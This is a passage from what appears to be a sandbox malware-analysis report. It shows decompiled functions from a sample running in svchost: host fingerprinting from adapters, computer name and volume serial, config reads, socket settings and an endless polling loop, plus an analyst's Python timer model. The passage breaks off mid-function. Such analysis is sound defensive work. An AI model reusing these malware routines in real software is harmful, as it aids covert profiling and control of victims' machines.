                                                                                                                                  • setsockopt.WS2_32(00000004,0000FFFF,00001005,00000004,00000004), ref: 0251F2C0
                                                                                                                                  • setsockopt.WS2_32(00000004,0000FFFF,00001006,00000004,00000004), ref: 0251F2DD
                                                                                                                                  • setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 0251F2EC
                                                                                                                                  • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 0251F2FD
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: setsockopt
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3981526788-0
                                                                                                                                  • Opcode ID: b12faa0a10d5bb9b766e7ccc52d7d3bb3a33765d2d4ab28012de3fbd48a65544
                                                                                                                                  • Instruction ID: 354b62f87567e847badde843e0d8419e6c1265618e793b2bf2487bc09a6e9fb6
                                                                                                                                  • Opcode Fuzzy Hash: b12faa0a10d5bb9b766e7ccc52d7d3bb3a33765d2d4ab28012de3fbd48a65544
                                                                                                                                  • Instruction Fuzzy Hash: 33110DB1A40248BAEF11DF94CD41FDE7FBDEB44751F004066BB04EA1D0E6B19A44DB94
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1353 2511bdf-2511c04 call 2511ac3 1355 2511c09-2511c0b 1353->1355 1356 2511c5a-2511c5e 1355->1356 1357 2511c0d-2511c1d GetComputerNameA 1355->1357 1358 2511c45-2511c57 GetVolumeInformationA 1357->1358 1359 2511c1f-2511c24 1357->1359 1358->1356 1359->1358 1360 2511c26-2511c3b 1359->1360 1360->1360 1361 2511c3d-2511c3f 1360->1361 1361->1358 1362 2511c41-2511c43 1361->1362 1362->1356
                                                                                                                                  C-Code - Quality: 76%
                                                                                                                                   			// Derives a 32-bit host identifier. Order of preference: the value returned by the
                                                                                                                                   			// subcall E02511AC3 (which resolves and calls GetAdaptersAddresses), then an XOR-fold
                                                                                                                                   			// of the computer name, then the volume serial number of the current root directory.
                                                                                                                                   			E02511BDF() {
                                                                                                                                   				long _v8;                 // in/out size for GetComputerNameA (initialised to 0xf = 15 chars)
                                                                                                                                   				long _v12;                // receives the volume serial number
                                                                                                                                   				void* _v27;
                                                                                                                                   				char _v28;                // start of the 16-byte computer-name buffer (zeroed below)
                                                                                                                                   				void* _t14;
                                                                                                                                   				signed int _t21;          // loop index over the computer-name bytes
                                                                                                                                   				signed int _t30;          // running XOR-fold result
                                                                                                                                   				void* _t31;               // frame pointer (decompiler artifact); _t31 - 0x18 addresses the name buffer
                                                                                                                                   
                                                                                                                                   				_v28 = 0;
                                                                                                                                   				asm("stosd");             // zero the remaining 15 bytes of the name buffer (3 dwords + word + byte)
                                                                                                                                   				asm("stosd");
                                                                                                                                   				asm("stosd");
                                                                                                                                   				asm("stosw");
                                                                                                                                   				_t30 = 0;
                                                                                                                                   				_v12 = 0;
                                                                                                                                   				asm("stosb");
                                                                                                                                   				_v8 = 0xf;
                                                                                                                                   				_t14 = E02511AC3(); // executed
                                                                                                                                   				if(_t14 == 0) {
                                                                                                                                   					// Subcall produced nothing: fall back to the computer name.
                                                                                                                                   					if(GetComputerNameA( &_v28,  &_v8) == 0) {
                                                                                                                                   						L6:
                                                                                                                                   						// Last resort: volume serial number of the current root directory.
                                                                                                                                   						GetVolumeInformationA(0, 0, 4,  &_v12, 0, 0, 0, 0);
                                                                                                                                   						return _v12;
                                                                                                                                   					}
                                                                                                                                   					_t21 = 0;
                                                                                                                                   					if(_v8 <= 0) {
                                                                                                                                   						goto L6;
                                                                                                                                   					} else {
                                                                                                                                   						goto L3;
                                                                                                                                   					}
                                                                                                                                   					do {
                                                                                                                                   						L3:
                                                                                                                                   						// XOR-fold each name byte into _t30; the shift amount depends on the byte index.
                                                                                                                                   						_t30 = _t30 ^  *(_t31 + _t21 - 0x18) << (_t21 & 0x00000003) << 0x00000003;
                                                                                                                                   						_t21 = _t21 + 1;
                                                                                                                                   					} while (_t21 < _v8);
                                                                                                                                   					if(_t30 == 0) {
                                                                                                                                   						goto L6;     // an all-zero fold is treated as failure
                                                                                                                                   					}
                                                                                                                                   					return _t30;
                                                                                                                                   				}
                                                                                                                                   				return _t14;         // identifier from the adapter-based subcall
                                                                                                                                   			}

                                                                                                                                  0x02511bec
                                                                                                                                  0x02511bf2
                                                                                                                                  0x02511bf3
                                                                                                                                  0x02511bf4
                                                                                                                                  0x02511bf5
                                                                                                                                  0x02511bf7
                                                                                                                                  0x02511bf9
                                                                                                                                  0x02511bfc
                                                                                                                                  0x02511bfd
                                                                                                                                  0x02511c04
                                                                                                                                  0x02511c0b
                                                                                                                                  0x02511c1d
                                                                                                                                  0x02511c45
                                                                                                                                  0x02511c51
                                                                                                                                  0x00000000
                                                                                                                                  0x02511c57
                                                                                                                                  0x02511c1f
                                                                                                                                  0x02511c24
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02511c26
                                                                                                                                  0x02511c26
                                                                                                                                  0x02511c35
                                                                                                                                  0x02511c37
                                                                                                                                  0x02511c38
                                                                                                                                  0x02511c3f
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02511c41
                                                                                                                                  0x02511c5e

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 02511AC3: LoadLibraryA.KERNEL32(Iphlpapi.dll,00000000,localcfg,?,hi_id,?,?,?,?,00000001), ref: 02511AD4
                                                                                                                                    • Part of subcall function 02511AC3: GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 02511AE9
                                                                                                                                    • Part of subcall function 02511AC3: GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,00000000,?,?,?,?,?,?,00000001), ref: 02511B20
                                                                                                                                  • GetComputerNameA.KERNEL32(?,0000000F), ref: 02511C15
                                                                                                                                  • GetVolumeInformationA.KERNEL32(00000000,00000000,00000004,00000001,00000000,00000000,00000000,00000000,?,?,?,?,00000001), ref: 02511C51
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AdaptersAddressAddressesComputerInformationLibraryLoadNameProcVolume
                                                                                                                                  • String ID: hi_id$localcfg
                                                                                                                                  • API String ID: 2794401326-2393279970
                                                                                                                                  • Opcode ID: ba937735d8c1c5a2ab0c1c9000c9a28296b70a29376112fc1b69a7feb43f4fef
                                                                                                                                  • Instruction ID: c43176cf9829ef1d5a8a083d6fb3287e4ab78ee1a473db3bd565c5650a306e0c
                                                                                                                                  • Opcode Fuzzy Hash: ba937735d8c1c5a2ab0c1c9000c9a28296b70a29376112fc1b69a7feb43f4fef
                                                                                                                                  • Instruction Fuzzy Hash: 70018472A04518BBFB50DEE8C8C49EFBABCB744649F1048B5D706E3540D2309E4496A4
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E0251EC54() {
                                                                                                                                  				long _v8;
                                                                                                                                  				struct _FILETIME _v16;
                                                                                                                                  				signed int _t11;
                                                                                                                                  
                                                                                                                                  				GetSystemTimeAsFileTime( &_v16);
                                                                                                                                  				GetVolumeInformationA(0, 0, 4,  &_v8, 0, 0, 0, 0); // executed
                                                                                                                                  				_t11 = (GetTickCount() ^ _v16.dwHighDateTime ^ _v8) & 0x7fffffff;
                                                                                                                                  				 *0x25236cc = _t11;
                                                                                                                                  				return _t11;
                                                                                                                                   			}
                                                                                                                                   Addresses: 0x0251ec5e 0x0251ec72 0x0251ec84 0x0251ec89 0x0251ec8f

                                                                                                                                  APIs
                                                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0251EC5E
                                                                                                                                  • GetVolumeInformationA.KERNEL32(00000000,00000000,00000004,?,00000000,00000000,00000000,00000000), ref: 0251EC72
                                                                                                                                  • GetTickCount.KERNEL32 ref: 0251EC78
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Time$CountFileInformationSystemTickVolume
                                                                                                                                  • String ID: 0 v
                                                                                                                                  • API String ID: 1209300637-3142137124
                                                                                                                                  • Opcode ID: 361771b50e6a115201e548eadc37cb114fcdd49dc0a746fad5cdcd3300b497ef
                                                                                                                                  • Instruction ID: b9d54153658150fd1f47d60fd274f7f235b08830170eb0a14b1e93fb6b470e8e
                                                                                                                                  • Opcode Fuzzy Hash: 361771b50e6a115201e548eadc37cb114fcdd49dc0a746fad5cdcd3300b497ef
                                                                                                                                  • Instruction Fuzzy Hash: 84E075B5850208BFEB11AFB0DC4AE7B77ACEB19214B910A50B911D60D0DA74AA189A68
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 60%
                                                                                                                                  			E02511B71() {
                                                                                                                                  				long _v8;
                                                                                                                                  				long _v12;
                                                                                                                                  				void* _v27;
                                                                                                                                  				char _v28;
                                                                                                                                  				signed int _t12;
                                                                                                                                  				signed int _t28;
                                                                                                                                  
                                                                                                                                  				_v28 = 0;
                                                                                                                                  				asm("stosd");
                                                                                                                                  				asm("stosd");
                                                                                                                                  				asm("stosd");
                                                                                                                                  				asm("stosw");
                                                                                                                                  				_v8 = 0;
                                                                                                                                  				asm("stosb");
                                                                                                                                  				_v12 = 0xf;
                                                                                                                                  				_t12 = E02511AC3(); // executed
                                                                                                                                  				GetComputerNameA( &_v28,  &_v12);
                                                                                                                                  				GetVolumeInformationA(0, 0, 4,  &_v8, 0, 0, 0, 0); // executed
                                                                                                                                  				_t28 = (_v28 ^ _v8 ^ _t12) & 0x7fffffff;
                                                                                                                                  				_v8 = _t28;
                                                                                                                                  				if(_t28 == 0) {
                                                                                                                                  					return E0251ECA5() & 0x7fffffff;
                                                                                                                                  				}
                                                                                                                                  				return _t28;
                                                                                                                                   			}
                                                                                                                                   Addresses: 0x02511b7e 0x02511b84 0x02511b85 0x02511b86 0x02511b87 0x02511b89 0x02511b8c 0x02511b8d 0x02511b94 0x02511ba3 0x02511bb8 0x02511bc8 0x02511bca 0x02511bcd 0x00000000 0x02511bd8 0x00000000

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 02511AC3: LoadLibraryA.KERNEL32(Iphlpapi.dll,00000000,localcfg,?,hi_id,?,?,?,?,00000001), ref: 02511AD4
                                                                                                                                    • Part of subcall function 02511AC3: GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 02511AE9
                                                                                                                                    • Part of subcall function 02511AC3: GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,00000000,?,?,?,?,?,?,00000001), ref: 02511B20
                                                                                                                                  • GetComputerNameA.KERNEL32(?,0000000F), ref: 02511BA3
                                                                                                                                  • GetVolumeInformationA.KERNEL32(00000000,00000000,00000004,02511EFD,00000000,00000000,00000000,00000000), ref: 02511BB8
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AdaptersAddressAddressesComputerInformationLibraryLoadNameProcVolume
                                                                                                                                  • String ID: localcfg
                                                                                                                                  • API String ID: 2794401326-1857712256
                                                                                                                                  • Opcode ID: 28cc90a146fe8cf621ebec03ddb5496770bf1e0f6fdd03463a80c800df6c1059
                                                                                                                                  • Instruction ID: 3bf6c26c0b2da292db294c23cc75dfe120f52bf41dd320635d6ecb8aa401ca41
                                                                                                                                  • Opcode Fuzzy Hash: 28cc90a146fe8cf621ebec03ddb5496770bf1e0f6fdd03463a80c800df6c1059
                                                                                                                                  • Instruction Fuzzy Hash: D6018BB6D01108BFEB009AE9C8819EFFABDAB98654F150462AB01E3180D6705E088AA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • inet_addr.WS2_32(00000001), ref: 02512693
                                                                                                                                  • gethostbyname.WS2_32(00000001), ref: 0251269F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: gethostbynameinet_addr
                                                                                                                                  • String ID: time_cfg
                                                                                                                                  • API String ID: 1594361348-2401304539
                                                                                                                                  • Opcode ID: 7c2322f5a4c0d7ee7c0cb33db66f00e373103db113ed403d2587809140ec5a57
                                                                                                                                  • Instruction ID: 68089f909d7759265c42ad08bcc6e9f8a053564d5e616832df8788d236696ff2
                                                                                                                                  • Opcode Fuzzy Hash: 7c2322f5a4c0d7ee7c0cb33db66f00e373103db113ed403d2587809140ec5a57
                                                                                                                                  • Instruction Fuzzy Hash: 56E0EC306155219FEB609E28F844A957BA5AF46230F064585F854D71D0DB30DC859698
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 92%
                                                                                                                                  			E0251E52E(void* __edx, void* __eflags) {
                                                                                                                                  				long _v4;
                                                                                                                                  				void* __ecx;
                                                                                                                                  				void* _t9;
                                                                                                                                  				void* _t11;
                                                                                                                                  				void* _t17;
                                                                                                                                  				long _t20;
                                                                                                                                  				void* _t23;
                                                                                                                                  				int _t24;
                                                                                                                                  				void* _t25;
                                                                                                                                  				void* _t28;
                                                                                                                                  				void* _t32;
                                                                                                                                  				void* _t37;
                                                                                                                                  				void* _t40;
                                                                                                                                  				void* _t44;
                                                                                                                                  
                                                                                                                                  				_t44 = __eflags;
                                                                                                                                  				_t32 = __edx;
                                                                                                                                  				E0251DD05();
                                                                                                                                  				_t28 = E0251DBCF(_t44, 0x80000000, 3);
                                                                                                                                  				_pop(_t31);
                                                                                                                                  				if(_t28 == 0xffffffff) {
                                                                                                                                  					L6:
                                                                                                                                  					_t9 = E02512544(0x25228f8, 0x25210d0, 7, 0xe4, 0xc8);
                                                                                                                                  					_t11 = E0251E3CA(_t32, 0x80000001, E02512544(0x25222f8, 0x25210bc, 0x14, 0xe4, 0xc8), _t9); // executed
                                                                                                                                  					_t40 = _t37 + 0x34;
                                                                                                                                  					if(_t11 == 0) {
                                                                                                                                  						_t17 = E02512544(0x25228f8, 0x25210d0, 7, 0xe4, 0xc8);
                                                                                                                                  						E0251E3CA(_t32, 0x80000001, E02512544(0x25222f8, 0x25210a0, 0x19, 0xe4, 0xc8), _t17); // executed
                                                                                                                                  						_t40 = _t40 + 0x34;
                                                                                                                                  					}
                                                                                                                                  					E0251EE2A(_t31, 0x25222f8, 0, 0x100);
                                                                                                                                  					E0251EE2A(_t31, 0x25228f8, 0, 0x100);
                                                                                                                                  					E0251DD69();
                                                                                                                                  					return 1;
                                                                                                                                  				}
                                                                                                                                  				_t20 = GetFileSize(_t28, 0);
                                                                                                                                  				_v4 = _t20;
                                                                                                                                  				if(_t20 != 0) {
                                                                                                                                  					E0251DB2E(_t20);
                                                                                                                                  					_t23 =  *0x25236c4; // 0x0
                                                                                                                                  					_pop(_t31);
                                                                                                                                  					if(_t23 != 0) {
                                                                                                                                  						_t31 =  &_v4;
                                                                                                                                  						_t24 = ReadFile(_t28, _t23, _v4,  &_v4, 0);
                                                                                                                                  						_t48 = _t24;
                                                                                                                                  						if(_t24 != 0) {
                                                                                                                                  							_t25 =  *0x25236c4; // 0x0
                                                                                                                                  							E02512544(_t25, _t25, _v4, 0xe4, 0xc8);
                                                                                                                                  							E0251E332(_t32, _t48,  *0x25236c4, _v4);
                                                                                                                                  							_t37 = _t37 + 0x1c;
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				CloseHandle(_t28);
                                                                                                                                  				goto L6;
                                                                                                                                   			}
                                                                                                                                   Addresses: 0x0251e52e 0x0251e52e 0x0251e533 0x0251e544 0x0251e54c 0x0251e553 0x0251e5b8 0x0251e5c7 0x0251e5ed 0x0251e5f2 0x0251e5f7 0x0251e603 0x0251e624 0x0251e629 0x0251e629 0x0251e635 0x0251e63e 0x0251e646 0x0251e653 0x0251e653 0x0251e558 0x0251e55e 0x0251e564 0x0251e567 0x0251e56c 0x0251e571 0x0251e574 0x0251e578 0x0251e583 0x0251e589 0x0251e58b 0x0251e58d 0x0251e59a 0x0251e5a9 0x0251e5ae 0x0251e5ae 0x0251e58b 0x0251e574 0x0251e5b2 0x00000000

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0251DD05: GetTickCount.KERNEL32 ref: 0251DD0F
                                                                                                                                    • Part of subcall function 0251DD05: InterlockedExchange.KERNEL32(025236B4,00000001), ref: 0251DD44
                                                                                                                                    • Part of subcall function 0251DD05: GetCurrentThreadId.KERNEL32 ref: 0251DD53
                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,761B43E0,?,00000000,?,0251A445), ref: 0251E558
                                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,761B43E0,?,00000000,?,0251A445), ref: 0251E583
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,761B43E0,?,00000000,?,0251A445), ref: 0251E5B2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$CloseCountCurrentExchangeHandleInterlockedReadSizeThreadTick
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3683885500-0
                                                                                                                                  • Opcode ID: 9e9c6146b896f09cb0532727ce2ff2649b483eca6d44c5cee48661d9f3795e13
                                                                                                                                  • Instruction ID: 77034e418546a4fa221fc236f5dc1a3685117705e15a06e44c790b4e4e1c4687
                                                                                                                                  • Opcode Fuzzy Hash: 9e9c6146b896f09cb0532727ce2ff2649b483eca6d44c5cee48661d9f3795e13
                                                                                                                                  • Instruction Fuzzy Hash: 28214EB2A803123BF2203A21DC46F6B3E5DFB96750F110814BE0AB51D3F651EC1889BD
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 93%
                                                                                                                                   			E0251877E() {
                                                                                                                                   				char _v256;
                                                                                                                                   				void* _t16;
                                                                                                                                   				char _t33;
                                                                                                                                   				char* _t36;
                                                                                                                                   				char _t45;
                                                                                                                                   				char _t47;
                                                                                                                                   				char* _t49; // used below but not declared in the decompiler output; holds "localcfg"
                                                                                                                                   				char* _t51; // used below but not declared in the decompiler output; holds "ip"
                                                                                                                                   				void* _t52;
                                                                                                                                   				void* _t53;
                                                                                                                                   
                                                                                                                                   				_t52 =  &_v256;
                                                                                                                                   				// Two timestamps (0x2522f14, 0x2522f10) are initialised once, guarded by flag bits in
                                                                                                                                   				// 0x2522f18. E0251F04E wraps GetSystemTimeAsFileTime (see APIs below); if it returns
                                                                                                                                   				// seconds, the 0x1e and 0xa comparisons further down are 30 s and 10 s timers, which
                                                                                                                                   				// is consistent with the 1000 ms Sleep at the end of each pass.
                                                                                                                                   				if(( *0x2522f18 & 0x00000001) == 0) {
                                                                                                                                   					 *0x2522f18 =  *0x2522f18 | 0x00000001;
                                                                                                                                   					 *0x2522f14 = E0251F04E(0);
                                                                                                                                   				}
                                                                                                                                   				if(( *0x2522f18 & 0x00000002) == 0) {
                                                                                                                                   					 *0x2522f18 =  *0x2522f18 | 0x00000002;
                                                                                                                                   					 *0x2522f10 = E0251F04E(0);
                                                                                                                                   				}
                                                                                                                                   				// Read the "ip" entry of the "localcfg" section; if it is present and E025126B2
                                                                                                                                   				// turns it into a value in _v256, store that value under the "rresolv" key.
                                                                                                                                   				_t51 = "ip";
                                                                                                                                   				_t49 = "localcfg";
                                                                                                                                   				_t47 = E0251E819(1, "localcfg", "ip", 0);
                                                                                                                                   				_t53 = _t52 + 0x10;
                                                                                                                                   				if(_t47 != 0 && E025126B2(_t47,  &_v256) != 0) {
                                                                                                                                   					E0251E8A1(_t45, 1, _t49, "rresolv",  &_v256);
                                                                                                                                   					_t53 = _t53 + 0x10;
                                                                                                                                   				}
                                                                                                                                   				// Main loop; it never returns (goto L7 at the end).
                                                                                                                                   				L7:
                                                                                                                                   				E02518CEE();
                                                                                                                                   				E0251C4D6();
                                                                                                                                   				E0251C4E2();
                                                                                                                                   				_push(0x2522118);
                                                                                                                                   				E02512011();
                                                                                                                                   				// Interval 1 (> 0x1e): re-read "ip"; if the returned value differs from the
                                                                                                                                   				// previous one, re-resolve it and rewrite "rresolv".
                                                                                                                                   				if(E0251F04E(0) -  *0x2522f14 > 0x1e) {
                                                                                                                                   					_t33 = E0251E819(1, _t49, _t51, _t47);
                                                                                                                                   					_t53 = _t53 + 0x10;
                                                                                                                                   					if(_t47 != _t33) {
                                                                                                                                   						if(E025126B2(_t33,  &_v256) != 0) { // no NULL check on _t33 here, unlike the first call
                                                                                                                                   							E0251E8A1(_t45, 1, _t49, "rresolv",  &_v256);
                                                                                                                                   							_t53 = _t53 + 0x10;
                                                                                                                                   						}
                                                                                                                                   						_t47 = _t33;
                                                                                                                                   					}
                                                                                                                                   					 *0x2522f14 = E0251F04E(0);
                                                                                                                                   				}
                                                                                                                                   				// Interval 2 (>= 0xa): run E02518328.
                                                                                                                                   				_t16 = E0251F04E(0);
                                                                                                                                   				_pop(_t36);
                                                                                                                                   				if(_t16 -  *0x2522f10 >= 0xa) {
                                                                                                                                   					E02518328(_t36, _t45); // executed
                                                                                                                                   					 *0x2522f10 = E0251F04E(0);
                                                                                                                                   				}
                                                                                                                                   				Sleep(0x3e8); // executed; 1000 ms per pass
                                                                                                                                   				goto L7;
                                                                                                                                   			}











                                                                                                                                   (Address column for the listing above, 0x0251877e .. 0x025188a5, one address per C-code line; the line-by-line alignment was lost in extraction.)

                                                                                                                                  APIs
                                                                                                                                  • Sleep.KERNEL32(000003E8), ref: 025188A5
                                                                                                                                    • Part of subcall function 0251F04E: SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,0251E342,00000000,745CF210,80000001,00000000,0251E513,?,00000000,00000000,?,000000E4), ref: 0251F089
                                                                                                                                    • Part of subcall function 0251F04E: GetSystemTimeAsFileTime.KERNEL32(80000001,?,?,?,0251E342,00000000,745CF210,80000001,00000000,0251E513,?,00000000,00000000,?,000000E4,000000C8), ref: 0251F093
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Time$FileSystem$Sleep
                                                                                                                                  • String ID: localcfg$rresolv
                                                                                                                                  • API String ID: 1561729337-486471987
                                                                                                                                  • Opcode ID: 1da587d4006bfb0b80a1ce69e64f2f4f4a81403fc6f5157b450afb9216710e2b
                                                                                                                                  • Instruction ID: 470f19c0db1982b8694dcfcaae4de7313db9651a670f6ae4f79ab2e04f8b3e72
                                                                                                                                  • Opcode Fuzzy Hash: 1da587d4006bfb0b80a1ce69e64f2f4f4a81403fc6f5157b450afb9216710e2b
                                                                                                                                  • Instruction Fuzzy Hash: 65219A315883027AF334FB65EC47F7A3AD9BB96724F550819FD04D50C0DB9149488DAD
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%
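The two interval checks in E0251877E above are easier to reason about against a clock you control. The following Python is an added analysis aid, not code from the sample or from Joe Sandbox: it keeps the loop's timer logic (the once-only timestamp initialisation, the > 0x1e and >= 0xa comparisons, the 1000 ms Sleep) and replaces the config lookup E0251E819, the resolver E025126B2, the "rresolv" write E0251E8A1 and the four unresolved per-pass calls with callbacks. That E0251F04E returns seconds, and that the "changed ip" test is a comparison of the returned config values, are assumptions. With one-second passes the model shows the "ip" re-read firing every 31 s and E02518328 every 10 s, which is the cadence to expect in the sandbox's behaviour timeline for this thread.

```python
"""Timer model for the loop in E0251877E.  Added analysis aid, not code from the
sample or from Joe Sandbox: the config lookup, the resolver and the unresolved
per-pass calls are replaced by callbacks so the two interval checks can be
exercised against a simulated clock."""
from typing import Callable, List, Optional, Tuple

Event = Tuple[int, str]   # (simulated time, what happened)


class SimClock:
    """Stand-in for E0251F04E() and Sleep().  Assumption: E0251F04E returns a
    time in seconds (it is built on GetSystemTimeAsFileTime, see the APIs list)."""

    def __init__(self) -> None:
        self.t = 0

    def now(self) -> int:
        return self.t

    def sleep(self, ms: int) -> None:
        self.t += ms // 1000


def run_main_loop(clock: SimClock,
                  read_ip: Callable[[], Optional[str]],       # E0251E819(1, "localcfg", "ip", 0)
                  resolve: Callable[[Optional[str]], bool],   # E025126B2(value, &_v256)
                  periodic: Callable[[], None],               # E02518328
                  iterations: int) -> List[Event]:
    """Run the loop for a bounded number of passes (the sample itself never returns)."""
    events: List[Event] = []
    t_ip = clock.now()        # *0x2522f14, set once, guarded by a flag bit in 0x2522f18
    t_periodic = clock.now()  # *0x2522f10, likewise
    ip = read_ip()
    if ip is not None and resolve(ip):
        events.append((clock.now(), "rresolv"))   # E0251E8A1(..., "localcfg", "rresolv", &_v256)
    for _ in range(iterations):
        # E02518CEE / E0251C4D6 / E0251C4E2 / E02512011(0x2522118) run here on every pass; not modelled.
        if clock.now() - t_ip > 0x1e:
            events.append((clock.now(), "ip_check"))
            new_ip = read_ip()
            if new_ip != ip:   # assumption: the two E0251E819 results are compared by value
                if resolve(new_ip):   # the sample does no NULL check in this branch
                    events.append((clock.now(), "rresolv"))
                ip = new_ip
            t_ip = clock.now()
        if clock.now() - t_periodic >= 0xa:
            periodic()
            events.append((clock.now(), "periodic"))
            t_periodic = clock.now()
        clock.sleep(0x3e8)   # 1000 ms per pass
    return events


def times(events: List[Event], kind: str) -> List[int]:
    """Simulated times at which events of one kind occurred."""
    return [t for t, k in events if k == kind]


if __name__ == "__main__":
    clock = SimClock()
    # Constructed config source: the "ip" value changes after 60 simulated seconds.
    ev = run_main_loop(clock,
                       lambda: "cfg-ip-A" if clock.now() < 60 else "cfg-ip-B",
                       lambda value: value is not None,
                       lambda: None,
                       101)
    for kind in ("ip_check", "rresolv", "periodic"):
        print(kind, times(ev, kind))
```

Because the first check is strictly greater than 0x1e and the clock only advances in one-second Sleep steps, the "ip" refresh lands at 31 s, 62 s, 93 s rather than at exact 30 s multiples; the >= 0xa check fires on exact 10 s multiples. A change of the "ip" value is only acted on at the next refresh, so a new "rresolv" write trails the config change by up to 31 s.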

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                   			E02514000(CHAR* _a4, signed int* _a8) {
                                                                                                                                   				void* _t3;
                                                                                                                                   				long _t6;
                                                                                                                                   				void* _t8;
                                                                                                                                   				signed int* _t9;
                                                                                                                                   
                                                                                                                                   				_t9 = _a8;
                                                                                                                                   				_t8 = 0;                        // retry counter
                                                                                                                                   				 *_t9 =  *_t9 | 0xffffffff;     // out-parameter preset to INVALID_HANDLE_VALUE (-1)
                                                                                                                                   				while(1) {
                                                                                                                                   					// CreateFileA(_a4, GENERIC_READ|GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE, NULL,
                                                                                                                                   					//             OPEN_EXISTING, FILE_FLAG_OVERLAPPED|FILE_ATTRIBUTE_NORMAL, NULL)
                                                                                                                                   					_t3 = CreateFileA(_a4, 0xc0000000, 3, 0, 3, 0x40000080, 0); // executed
                                                                                                                                   					if(_t3 != 0xffffffff) {
                                                                                                                                   						break;
                                                                                                                                   					}
                                                                                                                                   					_t6 = GetLastError();
                                                                                                                                   					if(_t6 == 2 || _t6 == 3) {  // ERROR_FILE_NOT_FOUND / ERROR_PATH_NOT_FOUND: give up
                                                                                                                                   						L6:
                                                                                                                                   						return 0;
                                                                                                                                   					} else {
                                                                                                                                   						if(_t6 == 5) {          // ERROR_ACCESS_DENIED: reported as success, but *_a8 stays -1
                                                                                                                                   							L9:
                                                                                                                                   							return 1;
                                                                                                                                   						}
                                                                                                                                   						Sleep(0x1f4);           // any other error (a sharing violation, for example): wait 500 ms
